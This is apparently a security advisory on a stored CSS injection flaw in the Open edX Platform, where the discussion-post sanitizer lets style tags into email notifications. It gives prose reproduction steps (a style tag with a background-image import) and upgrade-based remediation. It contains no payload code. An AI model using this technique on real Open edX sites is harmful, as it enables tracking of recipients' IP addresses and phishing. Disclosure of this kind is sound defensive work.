Open edX Platform Stored CSS Injection Vulnerability in Email Notifications

A stored CSS injection vulnerability has been identified in the Open edX Platform, specifically in versions starting from 'sumac'. The issue arises in the HTML sanitizer function 'clean_thread_html_body()', which is responsible for processing user-generated content in discussion posts before it is sent out in email notifications. The sanitizer fails to remove '<style>' tags, allowing enrolled students to inject arbitrary CSS. This injected CSS is rendered in email notifications using Django's 'safe' template filter, enabling email tracking (disclosure of IP addresses), content spoofing, and phishing attacks. The vulnerability has been patched in the 'ulmo', 'verawood', and 'master' versions.

Impact

Exploitation of this vulnerability allows for the injection of CSS into email notifications, which can be used to track email opens (disclosing the recipient's IP address), spoof content, and conduct phishing attacks by manipulating how the email is displayed.

Reproduction

To reproduce this vulnerability, an enrolled student must create a discussion post containing a '<style>' tag with injected CSS. Once the post is published, another user who receives email notifications about discussion posts will be tracked via the injected CSS, such as through a background image import.

Remediation

Users can update to the 'ulmo', 'verawood', or 'master' versions of the Open edX Platform to address this vulnerability.